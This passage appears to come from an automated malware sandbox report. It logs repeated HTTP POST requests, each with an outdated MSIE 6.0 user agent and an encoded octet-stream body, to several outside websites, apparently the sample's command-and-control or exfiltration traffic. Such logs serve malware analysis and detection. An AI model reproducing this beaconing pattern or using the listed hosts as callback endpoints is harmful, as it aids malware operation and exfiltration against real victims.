6e 2f 71 30 32 77 4c 33 42 65 2b 55 4a 6e 58 55 6b 4b 62 36 43 4d 76 5a 39 67 6e 64 77 32 4c 4e 66 42 77 2b 4c 39 6c 6e 4a 69 68 64 65 61 59 44 78 6b 53 64 32 6e 70 77 79 4b 70 32 4f 78 35 46 71 47 47 4d 6b 4a 6b 5a 42 78 47 4a 4c 41 6a 4b 62 6b 47 34 57 42 54 47 62 4a 49 63 54 64 4f 6b 57 4a 47 75 31 41 79 6f 55 6f 69 58 78 37 56 65 41 78 6f 42 43 69 6f 67 4b 76 6c 2b 5a 2b 49 63 58 58 44 79 6c 7a 56 68 44 59 2f 67 70 43 36 51 69 2b 61 53 6f 44 58 76 7a 73 50 4b 6d 6e 6d 6e 38 35 6f 65 73 4c 55 57 2f 68 6a 31 4e 39 72 66 58 56 38 33 5a 39 30 36 65 67 47 42 4c 4b 37 70 70 7a 58 34 34 30 44 66 45 45 35 35 6e 64 43 71 66 53 73 51 63 38 49 77 2f 34 48 44 4b 33 4d 56 76 32 58 53 79 56 6f 34 77 36 72 63 69 6c 64 35 68 6c 46 38 6a 35 61 51 46 4d 65 4d 61 6d 52 4b 75 72 32 57 4e 6d 4a 65 63 45 42 33 61 34 36 6d 64 47 59 33 71 4c 53 79 4e 32 72 4f 50 6b 6e 48 73 58 62 66 52 31 67 53 2b 45 6c 7a 35 37 79 31 58 32 79 33 31 41 31 45 58 4e 59 33 6d 59 76 55 6d 6e 70 6e 37 66 65 55 70 2f 4e 48 73 4b 45 44 6a 32 4d 77 64 66 2b 4d 78 79 69 50 42 59 44 62 31 4c 51 78 4f 59 55 61 6e 2f 71 4b 75 54 65 39 78 74 35 35 2f 48 42 79 34 58 57 64 4d 64 72 6c 38 64 4a 52 45 65 30 Data Ascii: Nmf5JuV31mRw96IMjEh1hF6ZE7kz2Zye6XrfBpdK54kGFRl5ovXYrjjkQjC4ELKF2bhfHC2AI1nbOBQLGRvPEpGGuZorvxdGEj+aw3kTIxyFYZw/58+NSirqG4pIuBRAtM5NUJRkYUJIDTcXQpupCOSWQCqLfZUOGCDBx7lonM5dOgms4/Y9wjkklhx/kJesEfG9veaNbSsagn/q02wL3Be+UJnXUkKb6CMvZ9gndw2LNfBw+L9lnJihdeaYDxkSd2npwyKp2Ox5FqGGMkJkZBxGJLAjKbkG4WBTGbJIcTdOkWJGu1AyoUoiXx7VeAxoBCiogKvl+Z+IcXXDylzVhDY/gpC6Qi+aSoDXvzsPKmnmn85oesLUW/hj1N9rfXV83Z906egGBLK7ppzX440DfEE55ndCqfSsQc8Iw/4HDK3MVv2XSyVo4w6rcild5hlF8j5aQFMeMamRKur2WNmJecEB3a46mdGY3qLSyN2rOPknHsXbfR1gS+Elz57y1X2y31A1EXNY3mYvUmnpn7feUp/NHsKEDj2Mwdf+MxyiPBYDb1LQxOYUan/qKuTe9xt55/HBy4XWdMdrl8dJREe0
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.alteor.clCache-Control: no-cacheData Raw: 71 48 39 51 6f 62 52 68 38 32 51 59 68 74 6d 38 44 36 46 4d 34 41 64 62 65 4f 36 73 74 4a 6e 39 4b 4c 49 52 2b 43 66 4a 6c 49 56 4f 67 37 31 70 47 4c 63 59 44 4d 42 47 73 4b 2b 2b 47 6b 30 66 39 56 79 78 42 70 4f 6a 43 49 69 37 7a 72 53 37 42 47 67 71 42 64 35 37 4c 52 31 75 75 4c 30 61 66 4b 2f 46 67 44 2f 74 45 53 51 51 2f 71 78 77 4b 43 6b 67 62 4d 53 6b 69 42 4d 33 61 7a 58 64 4b 56 64 70 50 73 74 33 5a 4d 34 71 2b 43 32 51 58 64 4e 73 63 7a 2f 79 77 65 43 50 39 37 55 77 69 72 78 51 75 37 32 53 6f 73 36 65 36 53 6d 50 55 4d 38 73 52 57 35 47 2b 62 31 68 64 51 52 38 6a 74 53 35 79 77 41 63 70 70 31 67 74 66 74 57 42 63 78 35 5a 6e 56 66 52 58 32 73 69 36 45 53 4e 4a 4f 4c 59 44 59 42 61 4b 42 53 51 63 32 73 2f 41 66 62 57 70 75 4f 75 4d 4f 76 70 4b 62 35 6e 31 61 6d 4b 75 36 75 5a 57 66 55 57 6a 46 68 71 50 65 4d 69 71 37 44 65 65 6a 6c 74 62 4d 38 2f 4a 31 52 6e 67 79 71 67 6d 43 4d 38 51 50 6f 4d 41 56 2f 47 55 75 58 67 52 43 51 64 42 67 6d 2b 6c 4c 50 79 4a 62 65 74 2f 49 59 59 41 75 34 55 6a 64 48 6c 4f 65 63 4e 52 7a 70 57 63 34 4d 54 6a 49 71 58 6a 47 30 31 6c 65 44 63 46 6d 48 58 62 6f 43 37 70 54 59 74 41 31 38 66 77 6e 47 39 43 51 6c 6e 44 69 39 6a 76 72 33 65 77 63 6e 48 71 7a 47 62 39 5a 43 58 61 70 77 39 6a 49 70 35 46 4b 30 5a 42 56 75 4f 70 5a 73 75 43 6c 6b 33 49 73 61 78 31 78 45 4c 64 67 49 4f 47 68 68 64 59 6f 74 49 79 37 4e 69 68 6d 71 48 58 6f 6f 4c 79 2b 62 34 61 61 58 6c 56 51 36 4f 72 62 36 69 51 69 57 58 62 67 74 55 50 41 4c 32 6a 42 4a 2f 41 49 53 69 44 45 6b 77 73 45 64 2b 2f 42 47 39 59 63 54 50 33 37 72 74 39 79 6e 6e 33 76 5a 51 56 4a 2f 53 6f 32 77 43 58 43 4a 48 62 71 38 35 69 63 43 51 41 3d 3d Data Ascii: qH9QobRh82QYhtm8D6FM4AdbeO6stJn9KLIR+CfJlIVOg71pGLcYDMBGsK++Gk0f9VyxBpOjCIi7zrS7BGgqBd57LR1uuL0afK/FgD/tESQQ/qxwKCkgbMSkiBM3azXdKVdpPst3ZM4q+C2QXdNscz/yweCP97UwirxQu72Sos6e6SmPUM8sRW5G+b1hdQR8jtS5ywAcpp1gtftWBcx5ZnVfRX2si6ESNJOLYDYBaKBSQc2s/AfbWpuOuMOvpKb5n1amKu6uZWfUWjFhqPeMiq7DeejltbM8/J1RngyqgmCM8QPoMAV/GUuXgRCQdBgm+lLPyJbet/IYYAu4UjdHlOecNRzpWc4MTjIqXjG01leDcFmHXboC7pTYtA18fwnG9CQlnDi9jvr3ewcnHqzGb9ZCXapw9jIp5FK0ZBVuOpZsuClk3Isax1xELdgIOGhhdYotIy7NihmqHXooLy+b4aaXlVQ6Orb6iQiWXbgtUPAL2jBJ/AISiDEkwsEd+/BG9YcTP37rt9ynn3vZQVJ/So2wCXCJHbq85icCQA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.valdal.comCache-Control: no-cacheData Raw: 39 79 6b 42 6f 37 39 76 38 32 51 4b 53 38 4f 5a 6e 72 72 34 52 45 69 51 39 51 49 56 48 31 47 45 59 31 50 33 43 67 44 66 73 47 5a 5a 68 6b 56 6e 71 6a 6d 5a 30 4b 6c 38 41 39 61 6f 34 4d 30 2f 59 70 44 57 70 61 48 31 74 70 63 58 6d 6f 75 2f 65 30 59 2b 34 7a 66 70 45 4c 4a 63 4c 54 69 36 72 56 51 33 59 43 30 78 6e 73 73 49 58 73 76 42 79 47 62 36 65 61 42 4a 39 53 6f 73 63 74 32 51 2b 41 44 56 2f 47 68 57 4f 6b 4f 4b 4b 66 39 4f 30 53 4c 71 76 51 44 75 52 55 4e 64 79 5a 45 67 53 64 47 58 71 39 51 48 59 64 74 4c 52 2b 7a 63 6e 36 78 53 38 30 2f 6f 49 63 4f 6a 41 53 51 6e 76 6f 4d 48 73 49 4d 53 77 35 6b 69 7a 7a 70 68 79 6e 6e 4c 36 71 63 57 67 76 41 67 74 31 6a 33 48 6f 54 59 55 70 65 62 47 71 4d 6f 52 66 2f 72 49 62 49 7a 67 50 38 34 4e 45 50 63 4b 6b 4a 72 4d 76 70 58 34 55 6c 36 62 55 6e 62 66 31 4d 4e 39 37 70 70 6c 6e 2f 79 77 39 37 5a 36 39 52 36 4e 32 65 65 42 35 59 76 77 63 31 6a 74 6e 30 5a 41 2b 72 46 36 53 5a 31 4d 34 71 38 61 52 65 2f 63 33 30 58 4b 6f 63 59 43 50 4e 71 53 6e 6e 70 6e 72 6c 6a 65 54 50 38 6c 57 58 75 4c 52 70 64 39 70 49 62 51 6d 67 46 55 42 50 66 7a 73 34 43 56 71 63 67 48 37 4c 50 76 78 47 6f 6d 6f 4a 47 6e 49 65 55 51 4b 61 45 57 38 6d 6d 54 49 6f 57 2b 44 68 46 33 33 56 47 6d 36 58 31 73 6f 61 62 71 6c 78 4f 74 4f 70 75 42 72 4c 74 54 50 79 7a 34 76 62 31 6d 42 46 5a 6a 63 62 6d 41 77 30 4e 2b 36 69 57 42 48 35 63 2b 34 43 6a 4a 74 49 6d 37 31 67 66 4a 54 5a 56 6f 44 7a 67 63 53 43 35 6d 4b 37 2b 6d 57 75 4d 66 51 51 35 33 53 49 52 6f 53 46 68 32 67 74 68 34 6c 79 71 65 51 4b 5a 74 32 58 34 57 6b 32 38 48 6b 4b 53 6b 47 67 6e 63 30 66 6f 2b 42 4c 7a 39 63 4a 77 50 2f 69 33 2f 54 39 47 4d 56 57 4e 65 64 59 37 52 6d 42 63 76 4e 74 4f 64 67 3d 3d Data Ascii: 9ykBo79v82QKS8OZnrr4REiQ9QIVH1GEY1P3CgDfsGZZhkVnqjmZ0Kl8A9ao4M0/YpDWpaH1tpcXmou/e0Y+4zfpELJcLTi6rVQ3YC0xnssIXsvByGb6eaBJ9Sosct2Q+ADV/GhWOkOKKf9O0SLqvQDuRUNdyZEgSdGXq9QHYdtLR+zcn6xS80/oIcOjASQnvoMHsIMSw5kizzphynnL6qcWgvAgt1j3HoTYUpebGqMoRf/rIbIzgP84NEPcKkJrMvpX4Ul6bUnbf1MN97ppln/yw97Z69R6N2eeB5Yvwc1jtn0ZA+rF6SZ1M4q8aRe/c30XKocYCPNqSnnpnrljeTP8lWXuLRpd9pIbQmgFUBPfzs4CVqcgH7LPvxGomoJGnIeUQKaEW8mmTIoW+DhF33VGm6X1soabqlxOtOpuBrLtTPyz4vb1mBFZjcbmAw0N+6iWBH5c+4CjJtIm71gfJTZVoDzgcSC5mK7+mWuMfQQ53SIRoSFh2gth4lyqeQKZt2X4Wk28HkKSkGgnc0fo+BLz9cJwP/i3/T9GMVWNedY7RmBcvNtOdg==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mqs.com.brCache-Control: no-cacheCookie: _mcnc=1Data Raw: 7a 39 65 55 58 41 76 57 36 47 53 58 71 43 50 68 59 6a 4f 64 43 48 52 6f 57 57 46 52 6b 64 41 7a 62 39 67 78 65 6b 64 42 51 58 50 78 2f 75 37 76 68 77 6a 45 78 4d 32 53 4c 52 6e 71 67 72 46 4a 62 68 49 6b 4c 31 63 54 55 36 50 68 49 66 37 71 44 56 78 59 44 66 6e 66 76 71 4d 63 59 4a 63 51 41 70 66 62 6a 6f 6e 66 33 37 31 4f 72 33 72 38 31 52 58 36 4b 57 49 4e 44 6e 43 73 52 64 54 53 78 72 70 37 74 6d 46 75 6b 49 72 50 4e 74 76 77 51 50 77 66 2f 6f 38 53 50 70 6c 42 4b 78 77 4a 6d 76 6e 66 59 42 41 58 52 34 45 6e 46 49 6d 63 64 57 45 6f 45 63 38 56 4f 41 46 66 6c 41 50 41 31 47 71 79 57 56 30 6a 44 47 46 65 38 4a 48 58 65 51 77 4c 55 34 6e 30 43 66 63 59 5a 45 32 58 7a 62 54 69 76 6a 2b 6d 68 53 4d 48 63 6a 55 52 75 49 77 62 46 59 59 2f 46 4a 50 76 4f 7a 42 6b 75 41 55 6a 56 65 70 77 37 67 65 43 55 62 2f 73 79 58 36 73 42 64 63 7a 33 53 57 4c 63 68 6f 48 63 51 2b 44 71 61 4c 68 5a 36 46 6c 53 2b 76 62 6a 32 75 2f 74 35 5a 44 45 68 30 34 66 34 39 51 66 56 32 74 65 6c 4b 58 54 41 70 37 6b 5a 65 74 77 45 76 39 30 36 31 71 78 6a 50 55 4d 62 65 52 58 4c 43 66 4f 32 35 2f 6c 4e 70 48 5a 70 39 35 68 77 6e 49 42 59 51 4a 6d 75 56 4d 71 76 2b 6a 6b 5a 65 39 38 63 38 45 4f 32 2b 69 6c 53 42 75 38 47 74 39 77 70 5a 74 62 4b 33 55 71 32 59 58 46 53 39 33 52 51 63 74 4f 52 2f 4f 6a 6c 2f 69 47 69 71 6c 33 65 47 4d 55 4b 44 34 34 31 2b 2b 31 73 6d 63 64 47 76 46 68 78 37 7a 51 4e 4f 64 4f 48 72 4c 45 34 47 4e 6c 38 31 7a 36 79 6d 37 35 4e 31 6f 54 30 54 55 73 6d 58 75 49 6f 44 4e 75 34 4b 50 2f 63 32 32 57 35 45 68 6e 49 6f 33 51 72 71 73 51 74 69 52 77 6a 69 66 35 70 71 37 2f 6b 43 50 62 73 51 46 79 65 4b 64 73 36 72 4f 68 42 78 56 57 72 50 6d 6a 61 2b 2f 69 51 4b 75 72 53 48 48 64 6c 76 66 49 30 41 45 74 4f 48 6d 71 32 6a 78 69 61 61 6d 57 69 53 56 62 67 3d 3d Data Ascii: z9eUXAvW6GSXqCPhYjOdCHRoWWFRkdAzb9gxekdBQXPx/u7vhwjExM2SLRnqgrFJbhIkL1cTU6PhIf7qDVxYDfnfvqMcYJcQApfbjonf371Or3r81RX6KWINDnCsRdTSxrp7tmFukIrPNtvwQPwf/o8SPplBKxwJmvnfYBAXR4EnFImcdWEoEc8VOAFflAPA1GqyWV0jDGFe8JHXeQwLU4n0CfcYZE2XzbTivj+mhSMHcjURuIwbFYY/FJPvOzBkuAUjVepw7geCUb/syX6sBdcz3SWLchoHcQ+DqaLhZ6FlS+vbj2u/t5ZDEh04f49QfV2telKXTAp7kZetwEv9061qxjPUMbeRXLCfO25/lNpHZp95hwnIBYQJmuVMqv+jkZe98c8EO2+ilSBu8Gt9wpZtbK3Uq2YXFS93RQctOR/Ojl/iGiql3eGMUKD441++1smcdGvFhx7zQNOdOHrLE4GNl81z6ym75N1oT0TUsmXuIoDNu4KP/c22W5EhnIo3QrqsQtiRwjif5pq7/kCPbsQFyeKds6rOhBxVWrPmja+/iQKurSHHdlvfI0AEtOHmq2jxiaamWiSVbg==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.valdal.comCache-Control: no-cacheData Raw: 39 79 6b 42 6f 37 39 76 38 32 51 4b 53 38 4f 5a 6e 72 72 34 52 45 69 51 39 51 49 56 48 31 47 45 59 31 50 33 43 67 44 66 73 47 5a 5a 68 6b 56 6e 71 6a 6d 5a 30 4b 6c 38 41 39 61 6f 34 4d 30 2f 59 70 44 57 70 61 48 31 74 70 63 58 6d 6f 75 2f 65 30 59 2b 34 7a 66 70 45 4c 4a 63 4c 54 69 36 72 56 51 33 59 43 30 78 6e 73 73 49 58 73 76 42 79 47 62 36 65 61 42 4a 39 53 6f 73 63 74 32 51 2b 41 44 56 2f 47 68 57 4f 6b 4f 4b 4b 66 39 4f 30 53 4c 71 76 51 44 75 52 55 4e 64 79 5a 45 67 53 64 47 58 71 39 51 48 59 64 74 4c 52 2b 7a 63 6e 36 78 53 38 30 2f 6f 49 63 4f 6a 41 53 51 6e 76 6f 4d 48 73 49 4d 53 77 35 6b 69 7a 7a 70 68 79 6e 6e 4c 36 71 63 57 67 76 41 67 74 31 6a 33 48 6f 54 59 55 70 65 62 47 71 4d 6f 52 66 2f 72 49 62 49 7a 67 50 38 34 4e 45 50 63 4b 6b 4a 72 4d 76 70 58 34 55 6c 36 62 55 6e 62 66 31 4d 4e 39 37 70 70 6c 6e 2f 79 77 39 37 5a 36 39 52 36 4e 32 65 65 42 35 59 76 77 63 31 6a 74 6e 30 5a 41 2b 72 46 36 53 5a 31 4d 34 71 38 61 52 65 2f 63 33 30 58 4b 6f 63 59 43 50 4e 71 53 6e 6e 70 6e 72 6c 6a 65 54 50 38 6c 57 58 75 4c 52 70 64 39 70 49 62 51 6d 67 46 55 42 50 66 7a 73 34 43 56 71 63 67 48 37 4c 50 76 78 47 6f 6d 6f 4a 47 6e 49 65 55 51 4b 61 45 57 38 6d 6d 54 49 6f 57 2b 44 68 46 33 33 56 47 6d 36 58 31 73 6f 61 62 71 6c 78 4f 74 4f 70 75 42 72 4c 74 54 50 79 7a 34 76 62 31 6d 42 46 5a 6a 63 62 6d 41 77 30 4e 2b 36 69 57 42 48 35 63 2b 34 43 6a 4a 74 49 6d 37 31 67 66 4a 54 5a 56 6f 44 7a 67 63 53 43 35 6d 4b 37 2b 6d 57 75 4d 66 51 51 35 33 53 49 52 6f 53 46 68 32 67 74 68 34 6c 79 71 65 51 4b 5a 74 32 58 34 57 6b 32 38 48 6b 4b 53 6b 47 67 6e 63 30 66 6f 2b 42 4c 7a 39 63 4a 77 50 2f 69 33 2f 54 39 47 4d 56 57 4e 65 64 59 37 52 6d 42 63 76 4e 74 4f 64 67 3d 3d Data Ascii: 9ykBo79v82QKS8OZnrr4REiQ9QIVH1GEY1P3CgDfsGZZhkVnqjmZ0Kl8A9ao4M0/YpDWpaH1tpcXmou/e0Y+4zfpELJcLTi6rVQ3YC0xnssIXsvByGb6eaBJ9Sosct2Q+ADV/GhWOkOKKf9O0SLqvQDuRUNdyZEgSdGXq9QHYdtLR+zcn6xS80/oIcOjASQnvoMHsIMSw5kizzphynnL6qcWgvAgt1j3HoTYUpebGqMoRf/rIbIzgP84NEPcKkJrMvpX4Ul6bUnbf1MN97ppln/yw97Z69R6N2eeB5Yvwc1jtn0ZA+rF6SZ1M4q8aRe/c30XKocYCPNqSnnpnrljeTP8lWXuLRpd9pIbQmgFUBPfzs4CVqcgH7LPvxGomoJGnIeUQKaEW8mmTIoW+DhF33VGm6X1soabqlxOtOpuBrLtTPyz4vb1mBFZjcbmAw0N+6iWBH5c+4CjJtIm71gfJTZVoDzgcSC5mK7+mWuMfQQ53SIRoSFh2gth4lyqeQKZt2X4Wk28HkKSkGgnc0fo+BLz9cJwP/i3/T9GMVWNedY7RmBcvNtOdg==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.depalo.comCache-Control: no-cacheData Raw: 36 77 42 77 4f 56 68 53 2b 47 54 68 2f 32 4c 51 57 7a 46 79 57 45 73 6e 46 68 67 67 50 4b 54 73 44 50 75 46 38 65 56 31 36 74 48 4e 42 70 48 55 68 4e 59 71 2b 70 37 58 4e 36 6e 4a 68 50 37 71 4f 67 75 70 53 63 59 7a 49 4a 4e 37 35 2b 34 64 43 35 76 64 5a 71 38 59 31 43 48 73 53 54 74 66 49 38 75 62 72 41 6a 64 6c 77 76 35 52 71 46 65 5a 76 53 64 5a 4f 73 46 56 45 6b 63 76 75 35 6b 32 6e 34 63 32 73 44 6b 72 5a 6b 78 7a 55 74 62 69 41 55 50 77 48 63 5a 63 6c 69 78 65 4a 43 59 46 4b 49 44 65 53 51 4f 61 33 4a 4a 61 47 4c 77 74 49 69 6f 43 53 72 43 77 54 34 4f 53 62 56 63 76 4e 2f 5a 4e 43 46 34 45 36 72 79 34 41 32 48 48 6c 65 46 37 4c 57 53 48 74 4c 44 47 34 50 76 2b 74 38 54 58 6f 48 4a 76 6d 6f 33 32 79 71 65 4e 52 4d 4b 6f 46 4b 55 56 71 6d 51 41 6e 37 45 5a 58 35 6f 6a 32 52 53 49 42 32 74 4a 70 66 53 66 6d 51 4c 46 6e 71 70 6b 47 4b 55 55 6d 50 4f 75 58 64 6a 56 65 74 73 55 4f 7a 75 70 56 49 4c 6b 67 37 5a 43 6d 42 75 57 79 31 4f 42 5a 4b 52 7a 72 58 67 70 72 4a 52 6c 51 39 52 6e 36 47 4d 78 31 77 48 72 65 35 6c 63 65 52 77 66 33 67 33 56 4d 46 43 35 55 72 36 49 33 66 44 68 49 2f 42 6e 59 42 70 36 43 45 46 64 4e 66 51 30 2f 37 44 4b 30 43 67 32 50 58 33 4f 31 6e 2b 4d 49 38 43 6e 64 47 50 4b 4c 53 70 6c 67 30 44 49 79 6b 72 54 73 5a 4e 44 5a 31 54 69 52 58 78 33 6c 74 6a 36 63 67 47 71 79 6a 73 53 4d 6b 48 72 71 35 31 7a 30 70 5a 35 6e 6a 58 55 36 37 6e 6e 68 65 35 77 35 58 79 37 53 61 78 79 6e 57 43 4b 6a 56 6d 57 70 2f 54 63 4c 4c 70 78 61 6e 43 48 47 4e 57 4b 76 30 2f 48 6a 37 4a 43 30 39 4a 46 79 4a 4d 34 30 53 54 67 33 39 37 45 41 71 63 2f 55 41 51 56 46 73 58 64 68 64 54 62 77 2b 42 38 51 3d 3d Data Ascii: 6wBwOVhS+GTh/2LQWzFyWEsnFhggPKTsDPuF8eV16tHNBpHUhNYq+p7XN6nJhP7qOgupScYzIJN75+4dC5vdZq8Y1CHsSTtfI8ubrAjdlwv5RqFeZvSdZOsFVEkcvu5k2n4c2sDkrZkxzUtbiAUPwHcZclixeJCYFKIDeSQOa3JJaGLwtIioCSrCwT4OSbVcvN/ZNCF4E6ry4A2HHleF7LWSHtLDG4Pv+t8TXoHJvmo32yqeNRMKoFKUVqmQAn7EZX5oj2RSIB2tJpfSfmQLFnqpkGKUUmPOuXdjVetsUOzupVILkg7ZCmBuWy1OBZKRzrXgprJRlQ9Rn6GMx1wHre5lceRwf3g3VMFC5Ur6I3fDhI/BnYBp6CEFdNfQ0/7DK0Cg2PX3O1n+MI8CndGPKLSplg0DIykrTsZNDZ1TiRXx3ltj6cgGqyjsSMkHrq51z0pZ5njXU67nnhe5w5Xy7SaxynWCKjVmWp/TcLLpxanCHGNWKv0/Hj7JC09JFyJM40STg397EAqc/UAQVFsXdhdTbw+B8Q==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.elpro.siCache-Control: no-cacheData Raw: 6e 35 2f 52 41 58 41 6b 42 32 58 49 75 78 4f 70 67 32 31 41 78 53 4e 31 6e 35 49 59 35 46 48 61 70 4b 4c 57 66 6c 6a 52 38 31 70 4c 2f 68 57 4c 2b 2b 68 67 31 47 52 57 74 4c 6a 37 63 71 33 47 36 54 59 44 36 66 39 6f 68 41 2b 39 38 4f 55 4e 47 51 77 50 63 63 64 53 31 32 74 56 38 78 70 58 59 6b 42 35 30 68 39 48 67 57 49 63 67 55 59 6e 45 76 45 4c 4c 39 36 75 33 2f 7a 31 79 50 38 34 6e 58 66 39 6e 36 68 71 43 32 33 38 57 46 61 6d 49 38 41 68 65 78 31 48 73 2b 65 31 47 42 49 4f 54 44 76 4f 75 4d 2f 6f 78 44 43 75 6d 45 53 70 56 4c 46 53 66 33 77 70 4e 41 68 64 4c 4b 71 65 36 30 6f 50 7a 7a 4b 65 2f 66 64 33 76 4b 6d 6c 68 48 38 73 30 41 37 4a 61 53 75 33 75 58 30 69 79 74 63 77 7a 4c 55 58 6e 6a 6a 6f 6d 70 70 76 52 69 49 6f 73 72 49 59 73 43 66 77 6e 4b 65 41 4d 6a 52 4f 2f 67 7a 44 72 47 56 2b 4f 4c 69 41 38 4f 6a 73 6a 64 63 69 2f 6a 56 78 63 45 47 73 4b 78 55 77 38 64 61 45 75 75 4f 45 52 34 75 5a 74 43 78 71 45 48 75 4e 59 78 34 65 38 2b 2b 50 6e 4f 39 49 33 61 77 53 77 31 4a 4c 39 6f 36 4d 6d 43 33 6f 31 2f 2f 53 57 57 42 67 47 48 76 38 6a 7a 7a 6d 76 78 30 6b 52 49 2f 2b 6b 42 5a 4c 77 69 51 52 33 59 77 5a 52 76 38 50 76 31 32 69 4d 38 36 4f 49 65 76 6a 72 4c 7a 63 42 67 77 79 36 33 56 72 49 52 33 46 4f 74 4a 33 45 52 45 65 56 45 54 41 6d 70 31 50 62 77 31 32 77 2f 6c 7a 65 32 65 4a 6b 4f 46 76 79 4a 32 4d 68 33 53 63 6d 56 53 34 4e 46 45 4d 49 4d 63 50 43 51 67 41 37 50 4e 6f 6f 30 52 2b 55 6b 55 57 4a 6f 6a 51 57 4a 37 66 4a 69 63 50 44 73 47 67 52 4b 6a 51 38 47 65 39 76 64 66 67 41 6b 38 31 49 64 50 77 71 78 4f 2b 56 54 4a 75 72 4d 48 6c 75 4b 42 6a 35 72 54 6b 35 75 45 2f 57 51 55 33 4b 79 57 47 39 44 2f 4f 52 34 6f 3d Data Ascii: n5/RAXAkB2XIuxOpg21AxSN1n5IY5FHapKLWfljR81pL/hWL++hg1GRWtLj7cq3G6TYD6f9ohA+98OUNGQwPccdS12tV8xpXYkB50h9HgWIcgUYnEvELL96u3/z1yP84nXf9n6hqC238WFamI8Ahex1Hs+e1GBIOTDvOuM/oxDCumESpVLFSf3wpNAhdLKqe60oPzzKe/fd3vKmlhH8s0A7JaSu3uX0iytcwzLUXnjjomppvRiIosrIYsCfwnKeAMjRO/gzDrGV+OLiA8Ojsjdci/jVxcEGsKxUw8daEuuOER4uZtCxqEHuNYx4e8++PnO9I3awSw1JL9o6MmC3o1//SWWBgGHv8jzzmvx0kRI/+kBZLwiQR3YwZRv8Pv12iM86OIevjrLzcBgwy63VrIR3FOtJ3EREeVETAmp1Pbw12w/lze2eJkOFvyJ2Mh3ScmVS4NFEMIMcPCQgA7PNoo0R+UkUWJojQWJ7fJicPDsGgRKjQ8Ge9vdfgAk81IdPwqxO+VTJurMHluKBj5rTk5uE/WQU3KyWG9D/OR4o=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 41 52 59 63 31 68 6d 35 42 57 55 61 42 30 4f 37 4b 45 2f 71 75 4c 4a 55 46 4d 4e 33 78 48 32 32 58 52 30 4e 61 35 72 46 34 65 4b 67 52 7a 54 72 77 50 32 78 63 6d 34 67 50 70 69 6c 38 4c 61 4c 54 42 78 69 4f 73 44 5a 53 72 42 69 7a 48 2f 62 44 48 33 74 4e 71 70 37 6c 65 54 33 4d 62 55 59 4c 32 2f 4b 62 4f 33 57 71 7a 7a 36 7a 6a 4d 68 7a 6f 57 6f 79 4e 72 77 72 56 2f 58 52 42 48 50 6f 57 6c 6e 54 61 63 48 53 30 6a 6a 4e 55 67 41 75 54 31 74 63 63 59 35 58 66 57 38 6b 52 39 34 61 5a 44 34 34 49 36 74 4e 35 36 73 65 7a 4c 41 30 47 4a 76 31 62 39 64 4c 54 65 6d 32 61 32 64 76 34 34 56 55 4a 45 72 73 44 4e 6c 50 74 73 73 4b 65 6f 6a 53 47 66 53 30 4e 6e 58 74 51 73 55 7a 6c 64 4d 4b 34 72 4c 7a 30 65 36 54 49 61 5a 36 4f 74 2f 78 54 53 6e 37 34 4e 49 56 33 61 6b 62 46 63 6f 36 77 32 75 2f 78 6c 49 4b 42 36 37 31 54 75 7a 33 6d 61 47 4e 7a 57 55 55 35 50 71 4d 55 6a 44 53 33 49 4d 61 44 71 6d 50 32 4e 6f 69 79 32 6b 30 6e 2f 62 34 36 65 30 6a 46 74 70 51 51 61 6c 35 59 38 73 73 73 44 37 46 58 52 6c 75 51 32 2b 71 62 32 59 62 4b 73 70 37 30 64 48 70 45 2b 6d 41 43 59 63 41 34 74 4b 56 48 6f 4a 6d 66 6c 2b 78 2f 71 2f 52 30 62 72 71 46 6d 6e 68 43 64 75 2b 35 69 2b 33 72 44 50 37 32 4b 6e 41 4f 6b 64 4f 47 37 62 2f 6e 36 46 74 63 41 2f 56 52 6e 5a 68 79 61 6e 6f 74 39 33 4d 6b 2b 63 55 49 4b 61 6f 41 62 57 32 53 33 4f 58 49 65 51 70 70 6e 2b 46 58 50 69 6b 6b 32 6b 36 30 49 48 61 37 76 62 6b 68 57 41 68 77 6e 2f 7a 4e 41 6f 53 6d 4c 4b 7a 57 4a 2f 62 4e 31 2f 38 4e 54 34 49 6a 4d 56 7a 4c 39 62 6e 78 44 55 72 77 68 31 2b 37 38 42 48 78 4a 45 41 52 36 56 32 6d 56 56 43 4b 6e 2b 43 45 61 77 72 77 4c 70 39 4d 33 30 44 33 32 34 32 34 6e 33 31 39 33 36 71 53 31 4a 35 59 5a 55 35 64 6d 69 32 6a 59 67 45 31 38 43 47 79 51 4a 33 38 74 6a 32 39 6f 3d Data Ascii: 